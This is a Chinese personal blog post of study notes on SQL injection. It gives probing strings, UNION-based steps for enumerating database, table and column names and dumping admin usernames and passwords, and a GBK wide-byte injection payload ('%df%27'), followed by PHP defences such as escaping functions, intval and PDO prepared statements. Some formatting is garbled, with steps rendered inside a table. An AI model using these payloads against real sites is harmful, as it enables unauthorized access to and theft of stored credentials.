<!DOCTYPE html>





<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.3.0">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.3.0">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.3.0">
  <link rel="mask-icon" href="/images/logo.svg?v=7.3.0" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.3.0">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.3.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: 'search.xml',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    }
  };
</script>

  <meta name="description" content="学习一波SQL注入">
<meta name="keywords" content="sql">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入">
<meta property="og:url" content="https://www.Gsuhy.cn/2018/02/05/SQL注入/index.html">
<meta property="og:site_name" content="Scorpio">
<meta property="og:description" content="学习一波SQL注入">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-08-18T03:30:35.847Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入">
<meta name="twitter:description" content="学习一波SQL注入">
  <link rel="canonical" href="https://www.Gsuhy.cn/2018/02/05/SQL注入/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>SQL注入 | Scorpio</title>
  <meta name="generator" content="Hexo 3.9.0">
  








  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">
  <div class="container use-motion">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Scorpio</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">Gsuhy</p>
      
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
      
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
  </ul>

    

</nav>
</div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content page-post-detail">
            

  <div id="posts" class="posts-expand">
    

  <article class="post" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://www.Gsuhy.cn/2018/02/05/SQL注入/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Gsuhy">
      <meta itemprop="description" content="每个人都应该拥有自己的梦想">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Scorpio">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">SQL注入

          
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              
                
              

              <time title="创建时间：2018-02-05 23:04:30" itemprop="dateCreated datePublished" datetime="2018-02-05T23:04:30+08:00">2018-02-05</time>
            </span>
          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2019-08-18 11:30:35" itemprop="dateModified" datetime="2019-08-18T11:30:35+08:00">2019-08-18</time>
              </span>
            
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/SQL/" itemprop="url" rel="index"><span itemprop="name">SQL</span></a></span>

                
                
              
            </span>
          

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>学习一波SQL注入<a id="more"></a></p>
<h3 id="0x01"><a href="#0x01" class="headerlink" title="0x01"></a>0x01</h3><p>基本的url编码：</p>
<ul>
<li>空格=%20</li>
<li>单引号=%27</li>
<li>#=%23</li>
<li>双引号=%2<h3 id="0x02概念"><a href="#0x02概念" class="headerlink" title="0x02概念"></a>0x02概念</h3>sql注入就是把通过sql命令插入到web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器并且执行恶意的sql命令的目的。也就是利用现有的应用程序，将恶意的sql命令注入到后台的数据库中并执行，可以通过在web表单中输入恶意的sql语句得到有一个存在安全漏洞的网站上的数据库信息。(将sql代码插入或添加到用户输入的参数中，再将这些参数传递到后台的sql服务器加以解析并执行)<h3 id="0x03报错模式"><a href="#0x03报错模式" class="headerlink" title="0x03报错模式"></a>0x03报错模式</h3></li>
<li>显错模式</li>
<li>盲注<h3 id="0x04寻找注入点-试探方法"><a href="#0x04寻找注入点-试探方法" class="headerlink" title="0x04寻找注入点-试探方法"></a>0x04寻找注入点-试探方法</h3></li>
<li>单引号、1=1/1=2测试</li>
<li>利用数据库系统函数进行测试</li>
</ul>
<pre><code>http://host/showdetail.asp?id=49  and 1=convert(int,(@@version))

http://host/showdetail.asp?id=49  and 1=convert(int,(select host_name()))

http://host/showdetail.asp?id=49  and 1=convert(int,(user))</code></pre><h3 id="UNION"><a href="#UNION" class="headerlink" title="UNION"></a>UNION</h3><p><code>select * from article where id=&quot;&quot; union select * from user where userid=1</code></p>
<table>
<thead>
<tr>
<th align="left">第一个select返回结果</th>
<th align="right">title</th>
<th align="center">content</th>
</tr>
</thead>
<tbody><tr>
<td align="left">第二个select执行后返回的结果</td>
<td align="right">username</td>
<td align="center">password</td>
</tr>
<tr>
<td align="left">也就是原来应该显示title和content的地方，分别显示为username何password</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">##### 注入步骤</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">- 注入点所查询表的字段数</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left"><code>order by 1</code></td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">- 判断回显</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left"><code>and 1=2 union select 1,2,3,4 from admin</code></td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">- 猜字段名</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left"><code>and 1=2 union select admin,2,password,4 from admin</code></td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">- 爆数据库名</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">`and 1=2 union select 1,user(), 3,database()</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">- 报表</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left"><code>and 1=2 union select 1, TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA = 0x70687074657374 (数据库的16进制编码) limit 0,1</code></td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">- 爆字段</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left"><code>and 1=2 union select 1, COLUMN_NAME,3,4 from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 0,1</code></td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">- 最后就是爆数据啦</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left"><code>and 1=2 union select 1, name,3,password from web.ad_user limit 0,1</code></td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">#### 四种报错注入方式</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">原理：当在函数比如count后面使用分组语句就会把查询的一部分以错误的形式显示</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">- floor报错</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">- extractvalue</td>
<td align="right"></td>
<td align="center"></td>
</tr>
<tr>
<td align="left">- updatexml</td>
<td align="right"></td>
<td align="center"></td>
</tr>
</tbody></table>
<h3 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h3><p>在PHP连接Mysql的时候，设置<code>set character_set_client=gbk</code>的时候就会导致宽字节注入这个漏洞 ，注入参数里带入<code>%df%27</code>，也就是把<code>\</code>给过滤。举个栗子<code>/index.php?id=1</code>这个有宽字节注入漏洞的话，提交<code>/index.php?id=-1&#39; and 1=1%23</code>那mysql后台运行的语句应该是<code>select * from user where id=&#39;1\&#39; and 1=1#&#39;</code>，很明显我们提交的单引号被转义导致前面的单引号就没有闭合,如果提交的语句为<code>/index.php?id=-1%df&#39; and 1=1%23</code>时，mysql运行的sql语句为<code>select * from user where id=&#39;1運&#39; and 1=1#&#39;</code><br>这是因为单引号被自动转义成了<code>\&#39;</code>，前面的<code>%df</code>和转义字符<code>\</code>组合成了<code>%df%5c</code>，也就是運字，这时候单引号还在的，就成功闭合了前面的单引号。原因是因为php在链接mysql时候设置了<code>set character_set_slient=gbk</code>,告诉客户端来源数据编码是GBK，然后mysql服务器对查询语句进行GBK转码导致<code>\</code>被吃掉。</p>
<h4 id="解决办法"><a href="#解决办法" class="headerlink" title="解决办法"></a>解决办法</h4><ul>
<li>在执行查询之前先执行<code>SET NAMES &#39;gbk&#39;,character_set_client=binary</code>.</li>
<li>使用<code>mysql_set_charset(&#39;gbk&#39;)</code>设置编码，然后用<code>mysql_real_escape_string()</code>函数过滤。</li>
<li>使用pdo方法，在php5.3.6及以下的版本设置<code>setAttribute(PDO::ATTR_EMULATE_PREPARES，false);</code>来禁用<code>preparede statements</code>的仿真效果。<h3 id="二次urldecode注入"><a href="#二次urldecode注入" class="headerlink" title="二次urldecode注入"></a>二次urldecode注入</h3>在字符被转换的时候是比较容易产生漏洞的，有些代码中使用了<code>urlcoede</code>或者<code>rawurldecode</code>函数就会导致二次编码，还记得上次班级对抗赛就有一道web题就有二次编码问题，但是由于当时太菜不知道这个东西，脑洞也没那么大，所以编码一次以后都不知道该怎么办。。。。。看书真的有用<h3 id="漏洞防范"><a href="#漏洞防范" class="headerlink" title="漏洞防范"></a>漏洞防范</h3><h4 id="听说有一个叫做魔术引号的东西magic-quotes-gpc、magic-quotes-runtime"><a href="#听说有一个叫做魔术引号的东西magic-quotes-gpc、magic-quotes-runtime" class="headerlink" title="听说有一个叫做魔术引号的东西magic_quotes_gpc、magic_quotes_runtime"></a>听说有一个叫做魔术引号的东西<code>magic_quotes_gpc、magic_quotes_runtime</code></h4>顺便先说一下数据污染，一般数据污染有两种方法</li>
<li>被动接受参数，就像GET,POST</li>
<li>主动获取参数，类似于读取远程页面或者文件内容。<br><code>magic_quotes_gpc</code>就是可以对GET,POST,COOKIED的值给过滤，<code>magic_quotes_runtime</code>是对从数据库或者文件汇总获取的数据进行过滤。一般PHP中开启了这两个可以防止一些sql的注入漏洞。包括(‘)、(“)、()、和NULL。对于int注入就没有什么用。<h4 id="addslashes"><a href="#addslashes" class="headerlink" title="addslashes"></a>addslashes</h4>一个简单检查参数的函数，过滤的东西跟<code>magic_quotes_gpc</code>是一样的，程序先判断有没有开GPC，如果没开就过滤那些参数，不过参数必须是string型的。<br>举个栗子</li>
</ul>
<pre><code>&lt;?php
$str=&quot;abc&#39;&quot;;
echo?addslashes($str);
?&gt;
------
输出的是：abc\&#39;</code></pre><h4 id="mysql-real-escape-string-or-mysql-escape-string"><a href="#mysql-real-escape-string-or-mysql-escape-string" class="headerlink" title="mysql_real_escape_string or mysql_escape_string"></a>mysql_real_escape_string or mysql_escape_string</h4><p>两个都是对字符串进行过滤，唯一不一样的地方在于<code>mysql_real_escape_string</code>接受的是一个连接句柄并根据当前字符集转义字符串，比如</p>
<pre><code>&lt;?php
$con=mysql_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;123456&quot;);
$id=mysql_real_escape_string($_GET[&#39;id&#39;],$con);
$sql=&quot;select * from test where id=&#39;&quot;.id.&quot;&#39;&quot;;
echo $sql;
---------------
当`?id=1&#39;`时，输出则为：select * from test where id =&#39;1\&quot;</code></pre><h4 id="intval等字符转换"><a href="#intval等字符转换" class="headerlink" title="intval等字符转换"></a>intval等字符转换</h4><p>前面有提到过，转换字符什么什么的，基本上就会有漏洞产生，而且也说到<code>magic_quotes_gpc</code>对于int型的注入没什么用，所以就有这里的intval了，也就是说intval函数是将变量转换为int型。、</p>
<h3 id="PDO-prepare-预编译"><a href="#PDO-prepare-预编译" class="headerlink" title="PDO prepare 预编译"></a>PDO prepare 预编译</h3><h4 id="啥是PDO"><a href="#啥是PDO" class="headerlink" title="啥是PDO"></a>啥是PDO</h4><p>PHP 数据对象 （PDO） 扩展为PHP访问数据库定义了一个轻量级的一致接口。实现 PDO 接口的每个数据库驱动可以公开具体数据库的特性作为标准扩展功能。 注意利用 PDO 扩展自身并不能实现任何数据库功能；必须使用一个 具体数据库的 PDO 驱动 来访问数据库服务。<br>PDO 提供了一个 数据访问 抽象层，这意味着，不管使用哪种数据库，都可以用相同的函数（方法）来查询和获取数据。 PDO 不提供 数据库 抽象层；它不会重写 SQL，也不会模拟缺失的特性。如果需要的话，应该使用一个成熟的抽象层。<strong>而PDO prepare是通过预编译的方式来处理数据库查询</strong>。</p>
<h4 id="PDO-gt-query"><a href="#PDO-gt-query" class="headerlink" title="PDO-&gt;query()"></a>PDO-&gt;query()</h4><p><code>PDO-&gt;query()</code> 用于查询数据记录并返回查询结果。<br>语法：</p>
<p><code>PDO-&gt;query( string statement )</code></p>
<p>例子：</p>
<pre><code>&lt;?php
//构造PDO连接
$dbh = &quot;mysql:host=localhost;dbname=test&quot;;
$db = new PDO($dbh, &#39;root&#39;, &#39;root123&#39;);
$db-&gt;query(&quot;set character set &#39;gbk&#39;&quot;);

//查询数据
$sql = &quot;SELECT * FROM user&quot;;
$sth = $db-&gt;query($sql);
while($row = $sth-&gt;fetch()){
    echo &quot;用户名:&quot;.$row[&#39;username&#39;].&quot;&lt;br /&gt;&quot;;
    echo &quot;电子邮件:&quot;.$row[&#39;email&#39;].&quot;&lt;br /&gt;&quot;;
    echo &quot;注册日期:&quot;.date(&quot;Y-m-d&quot;, $row[&#39;regdate&#39;]).&quot;&lt;br /&gt;&lt;br /&gt;&quot;;
}
$db = null;
?&gt;</code></pre><p>在上面的例子中，是通过仿照 MySQL 的查询例子，用 PDO 的方式对 user 表进行查询操作。</p>
<h4 id="PDOStatement-gt-fetch"><a href="#PDOStatement-gt-fetch" class="headerlink" title="PDOStatement-&gt;fetch()"></a>PDOStatement-&gt;fetch()</h4><p>PDO 中的 <code>fetch()</code>方法用于从结果集中获取一行结果，该方法行为类似 <code>mysql_fetch_array()</code>，不同的是该方法不仅返回数组，还可返回对象。</p>
<p>语法：<br><code>PDOStatement-&gt;fetch(int mode)</code><br>mode 为可选参数，表示希望返回的结果集类型，默认为关联及数字索引共有的数组形式。<br>mode参数可以取很多值。</p>
<ul>
<li>PDO::FETCH_ASSOC    关联索引（字段名）数组形式</li>
<li>PDO::FETCH_NUM    数字索引数组形式</li>
<li>PDO::FETCH_BOTH    默认，关联及数字索引数组形式都有</li>
<li>PDO::FETCH_OBJ    按照对象的形式</li>
<li>PDO::FETCH_BOUND    通过 bindColumn() 方法将列的值赋到变量上</li>
<li>PDO::FETCH_CLASS    以类的形式返回结果集，如果指定的类属性不存在，会自动创建</li>
<li>PDO::FETCH_INTO    将数据合并入一个存在的类中进行返回</li>
<li>PDO::FETCH_LAZY     结合了 PDO::FETCH_BOTH、 PDO::FETCH_OBJ，在它们被调用时创建对象变量</li>
</ul>
<h4 id="PDOStatement-gt-setFetchMode"><a href="#PDOStatement-gt-setFetchMode" class="headerlink" title="PDOStatement-&gt;setFetchMode()"></a>PDOStatement-&gt;setFetchMode()</h4><p>如果不在 fetch() 中指定返回的结果类型，也可以单独使用 setFetchMode() 方法设定，如：</p>
<pre><code>......
$sth = $db-&gt;query($sql);
$sth-&gt;setFetchMode(PDO::FETCH_ASSOC);
while($row = $result-&gt;fetch()){
    ......
}</code></pre><h4 id="PDOStatement-gt-fetchAll"><a href="#PDOStatement-gt-fetchAll" class="headerlink" title="PDOStatement-&gt;fetchAll()"></a>PDOStatement-&gt;fetchAll()</h4><p><code>fetchAll()</code> 方法用于把数据从数据集一次性取出并放入数组中。</p>
<p>语法：</p>
<p><code>PDOStatement-&gt;fetchAll([int mode [,int column_index]])</code></p>
<p>mode 为可选参数，表示希望返回的数组，column_index 表示列索引序号，当 mode 取值 <code>PDO::FETCH_COLUMN</code>时指定。mode参数可以取这些值</p>
<ul>
<li>PDO::FETCH_COLUMN    指定返回返回结果集中的某一列，具体列索引由 column_index 参数指定</li>
<li>PDO::FETCH_UNIQUE    以首个键值下表，后面数字下表的形式返回结果集</li>
<li>PDO::FETCH_GROUP    按指定列的值分组</li>
</ul>
<p>例子</p>
<pre><code>$sth = $db-&gt;query($sql);
$row = $sth-&gt;fetchAll();

//只返回 username（index=1）
$row = $sth-&gt;fetchAll(PDO::FETCH_COLUMN, 1);

//将 username GROUP 返回（注：由于表中 username 无重复记录，因此本例无意义）
$row = $sth-&gt;fetchAll(PDO::FETCH_COLUMN|PDO::FETCH_GROUP, 1);
</code></pre><p>未完….还有很多很多</p>

    </div>

    
    
    
        
      

      <footer class="post-footer">
          
            
          
          <div class="post-tags">
            
              <a href="/tags/sql/" rel="tag"># sql</a>
            
          </div>
        

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
                <a href="/2018/02/05/python学习笔记(一)/" rel="next" title="python学习笔记(一）">
                  <i class="fa fa-chevron-left"></i> python学习笔记(一）
                </a>
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
                <a href="/2018/02/05/变量覆盖/" rel="prev" title="变量覆盖">
                  变量覆盖 <i class="fa fa-chevron-right"></i>
                </a>
              
            </div>
          </div>
        
      </footer>
    
  </div>
  
  
  
  </article>

  </div>


          </div>
          

        </div>
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">
        
        
        
        
      

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc" data-target="post-toc-wrap">
          文章目录
        </li>
        <li class="sidebar-nav-overview" data-target="site-overview-wrap">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01"><span class="nav-number">1.</span> <span class="nav-text">0x01</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02概念"><span class="nav-number">2.</span> <span class="nav-text">0x02概念</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03报错模式"><span class="nav-number">3.</span> <span class="nav-text">0x03报错模式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04寻找注入点-试探方法"><span class="nav-number">4.</span> <span class="nav-text">0x04寻找注入点-试探方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#UNION"><span class="nav-number">5.</span> <span class="nav-text">UNION</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#宽字节注入"><span class="nav-number">6.</span> <span class="nav-text">宽字节注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#解决办法"><span class="nav-number">6.1.</span> <span class="nav-text">解决办法</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#二次urldecode注入"><span class="nav-number">7.</span> <span class="nav-text">二次urldecode注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞防范"><span class="nav-number">8.</span> <span class="nav-text">漏洞防范</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#听说有一个叫做魔术引号的东西magic-quotes-gpc、magic-quotes-runtime"><span class="nav-number">8.1.</span> <span class="nav-text">听说有一个叫做魔术引号的东西magic_quotes_gpc、magic_quotes_runtime</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#addslashes"><span class="nav-number">8.2.</span> <span class="nav-text">addslashes</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#mysql-real-escape-string-or-mysql-escape-string"><span class="nav-number">8.3.</span> <span class="nav-text">mysql_real_escape_string or mysql_escape_string</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#intval等字符转换"><span class="nav-number">8.4.</span> <span class="nav-text">intval等字符转换</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PDO-prepare-预编译"><span class="nav-number">9.</span> <span class="nav-text">PDO prepare 预编译</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#啥是PDO"><span class="nav-number">9.1.</span> <span class="nav-text">啥是PDO</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#PDO-gt-query"><span class="nav-number">9.2.</span> <span class="nav-text">PDO-&gt;query()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#PDOStatement-gt-fetch"><span class="nav-number">9.3.</span> <span class="nav-text">PDOStatement-&gt;fetch()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#PDOStatement-gt-setFetchMode"><span class="nav-number">9.4.</span> <span class="nav-text">PDOStatement-&gt;setFetchMode()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#PDOStatement-gt-fetchAll"><span class="nav-number">9.5.</span> <span class="nav-text">PDOStatement-&gt;fetchAll()</span></a></li></ol></li></ol></div>
        
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Gsuhy</p>
  <div class="site-description motion-element" itemprop="description">每个人都应该拥有自己的梦想</div>
</div>
  <nav class="site-state motion-element">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">31</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-categories">
        
          
            <a href="/categories/">
          
        
        
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">分类</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-tags">
        
          
            <a href="/tags/">
          
        
        
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">标签</span>
        </a>
      </div>
    
  </nav>



        </div>
      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Gsuhy</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0</div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.3.0</div>

        












        
      </div>
    </footer>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

  </div>

  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="/js/utils.js?v=7.3.0"></script><script src="/js/motion.js?v=7.3.0"></script>
<script src="/js/schemes/muse.js?v=7.3.0"></script>
<script src="/js/next-boot.js?v=7.3.0"></script>



  





















  

  

  

</body>
</html>
